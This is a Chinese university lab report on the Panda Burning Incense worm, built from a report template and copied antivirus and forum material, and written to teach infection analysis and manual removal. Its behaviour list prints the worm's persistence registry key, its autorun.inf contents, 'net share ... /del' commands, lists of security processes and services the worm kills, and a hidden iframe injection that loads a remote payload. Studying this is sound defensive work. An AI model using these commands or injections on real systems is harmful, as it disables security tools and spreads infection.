《网络攻击与防御》实验报告计算机科学与技术学院计算机系网络教研室制实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节，而实验报告的撰写又是知识系统化的吸收和升华过程，因此，实验报告应该体现完整性、规范性、正确性、有效性。

现将实验报告撰写的有关内容说明如下：1、实验报告模板为电子版。

2、下载统一的实验报告模板，学生自行完成撰写和打印。

报告的首页包含本次实验的一般信息：组号：例如：2-5 表示第二班第5组。

实验日期：例如：05-10-06 表示本次实验日期。

(年-月-日)……实验编号：例如：表示第一个实验。

实验时间：例如：2学时表示本次实验所用的时间。

实验报告正文部分，从六个方面（目的、内容、步骤等）反映本次实验的要点、要求以及完成过程等情况。

模板已为实验报告正文设定统一格式，学生只需在相应项内填充即可。

续页不再需要包含首页中的实验一般信息。

3、实验报告正文部分具体要求如下：一、实验目的本次实验所涉及并要求掌握的知识点。

二、实验环境实验所使用的设备名称及规格，网络管理工具简介、版本等。

三、实验内容与实验要求实验内容、原理分析及具体实验要求。

四、实验过程与分析根据具体实验，记录、整理相应命令、运行结果等，包括截图和文字说明。

详细记录在实验过程中发生的故障和问题，并进行故障分析，说明故障排除的过程及方法。

五、实验结果总结对实验结果进行分析，完成思考题目，总结实验的心得体会，并提出实验的改进意见。

1）掌握熊猫烧香病毒的工作原理和感染方法；2）掌握手工清除熊猫病毒的基本方法。

目标主机为windows-2003所用到的工具o Wsyschecko Filemon三、实验内容与实验要求蠕虫原理1）蠕虫定义2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。

这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。

前一段时间发现自己电脑里出现不少图标变成了一个熊猫烧香的图标，心里想看来是中毒的，上网查了一下，找到不少资料，大家分享！提高警惕！熊猫烧香是近期流传的一个相当厉害的病毒，属于威金的一个最新变种蠕虫病毒。

很多朋友中了以后用杀毒软件根本杀不死，只能忍痛割爱删除硬盘里所有的程序文件。

这个病毒严格的说是去年12月份开始流行的，按说杀毒软件应该已经升级解决了，但由于熊猫烧香的生命力惊人，经过这样长的一段时间仍然没有死绝。

问：什么是熊猫烧香病毒？答：“熊猫烧香”其实是一种蠕虫病毒的变种，而且是经过多次变种而来的。

尼姆亚变种W(Worm.Nimaya. w)，由于中毒电脑的可执行文件会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。

用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

同时，该病毒的某些变种可以通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致企业局域网瘫痪，无法正常使用。

病毒特征1、这个病毒关闭众多杀毒软件和安全工具2、循环遍历磁盘目录，感染文件，对关键系统文件跳过3、感染所有EXE、SCR、PIF、COM文件,并更改图标为烧香熊猫4、感染所有.htm/.html/.asp/.php/.jsp/.aspx文件，添加木马恶意代码5、自动删除*.gho文件如何预防“熊猫烧香”系列病毒“熊猫烧香”蠕虫不但可以对用户系统进行破坏，导致大量应用软件无法使用，而且还可删除扩展名为gh o的所有文件，造成用户的系统备份文件丢失，从而无法进行系统恢复；同时该病毒还能终止大量反病毒软件进程，大大降低用户系统的安全性。

这几天“熊猫烧香”的变种更是表象异常活跃，近半数的网民深受其害。

用户除了可以下载金山毒霸的“熊猫烧香”专杀来对付该病毒外，金山毒霸技术专家还总结的以下预防措施，帮你远离“熊猫烧香”病毒的骚扰。

1、立即检查本机administrator组成员口令，一定放弃简单口令甚至空口令，安全的口令是字母数字特殊字符的组合，自己记得住，别让病毒猜到就行。

在动手查杀熊猫烧香病毒之前，强烈建议先注意以下四点：1.本文包含两种熊猫烧香病毒变种的描述，请注意查看病毒症状，根据实际情况选用不同的查杀方法。

2.对于被熊猫烧香病毒感染的.exe可执行文件，推荐先备份，再修复！3.找回被熊猫烧香病毒删除的ghost(.gho)文件，详情请见文中！4.对计算机了解不多的用户，请在专家指导下清除熊猫烧香病毒。

熊猫烧香病毒变种一：病毒进程为“spoclsv.exe”这是“熊猫烧香”早期变种之一，特别之处是“杀死杀毒软件”，最恶劣之处在于感染全盘.exe文件和删除.gho文件（Ghost的镜像文件）。

最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。

目前所有专杀工具及杀毒软件均不会修复此病毒行为。

需要手动清除病毒添加的代码，且一定要清除。

否则访问了有此代码的网页，又会感染。

其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。

就不再单独列出。

病毒描述：“武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，（.gho为GHOST的备份文件），使用户的系统备份文件丢失。

被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

以下是熊猫烧香病毒详细行为和解决办法：熊猫烧香病毒详细行为：1.复制自身到系统目录下：%System%/drivers/spoclsv.exe（“%System%”代表Windows所在目录，比如：C:/Windows）不同的spoclsv.exe变种，此目录可不同。

比如12月爆发的变种目录是：C:/WINDOWS/System32/Drivers/spoclsv.exe。

2.创建启动项：[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run] "svcshare"="%System%/drivers/spoclsv.exe"3.在各分区根目录生成病毒副本：X:/setup.exeX:/autorun.infautorun.inf内容：[AutoRun]OPEN=setup.exeshellexecute=setup.exeshell/Auto/command=setup.exe4.使用net share命令关闭管理共享：cmd.exe /c net share X$ /del /ycmd.exe /c net share admin$ /del /y5.修改“显示所有文件和文件夹”设置：[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL]"CheckedValue"=dword:000000006.熊猫烧香病毒尝试关闭安全软件相关窗口：天网防火墙进程VirusScan NOD32 网镖杀毒毒霸瑞星江民黄山IE 超级兔子优化大师木马清道夫QQ病毒注册表编辑器系统配置实用程序卡巴斯基反病毒Symantec AntiVirusDuba Windows 任务管理器esteem procs 绿鹰PC 密码防盗噬菌体木马辅助查找器System Safety Monitor Wrapped gift Killer Winsock Expert游戏木马检测大师超级巡警msctls_statusbar32 pjf(ustc) IceSword7.尝试结束安全软件相关进程以及Viking病毒（威金病毒）进程：Mcshield.exe VsTskMgr.exe naPrdMgr.exe UpdaterUI.exe TBMon.exescan32.exe Ravmond.exe CCenter.exe RavTask.exeRav.exeRavmon.exe RavmonD.exe RavStub.exe KVXP.kxpKvMonXP.kxpKVCenter.kxp KVSrvXP.exe KRegEx.exe UIHost.exeTrojDie.kxpFrogAgent.exe Logo1_.exe Logo_1.exe Rundl132.exe8.禁用安全软件相关服务：Schedule sharedaccess RsCCenter RsRavMon KVWSC KVSrvXPkavsvc AVP McAfeeFramework McShield McTaskManager navapsvcwscsvc KPfwSvc SNDSrvc ccProxy ccEvtMgr ccSetMgrSPBBCSvc Symantec Core LC NPFMntor MskService FireSvc9.删除安全软件相关启动项：SOFTWARE/Microsoft/Windows/CurrentVersion/Run/RavTaskSOFTWARE/Microsoft/Windows/CurrentVersion/Run/KvMonXPSOFTWARE/Microsoft/Windows/CurrentVersion/Run/kavSOFTWARE/Microsoft/Windows/CurrentVersion/Run/KAVPersonal50SOFTWARE/Microsoft/Windows/CurrentVersion/Run/McAfeeUpdaterUISOFTWARE/Microsoft/Windows/CurrentVersion/Run/Network Associates Error Reporting ServiceSOFTWARE/Microsoft/Windows/CurrentVersion/Run/ShStatEXESOFTWARE/Microsoft/Windows/CurrentVersion/Run/YLive.exeSOFTWARE/Microsoft/Windows/CurrentVersion/Run/yassistse10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：<iframe src="hxxp:///wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>但不修改以下目录中的网页文件：C:/WINDOWSC:/WINNTC:/system32C:/Documents and SettingsC:/System Volume InformationC:/RecycledProgram Files/Windows NTProgram Files/WindowsUpdateProgram Files/Windows Media PlayerProgram Files/Outlook ExpressProgram Files/Internet ExplorerProgram Files/NetMeetingProgram Files/Common FilesProgram Files/ComPlus ApplicationsProgram Files/MessengerProgram Files/InstallShield Installation InformationProgram Files/MSNProgram Files/Microsoft FrontpageProgram Files/Movie MakerProgram Files/MSN Gamin Zone11.在访问过的目录下生成Desktop_.ini文件，内容为当前日期。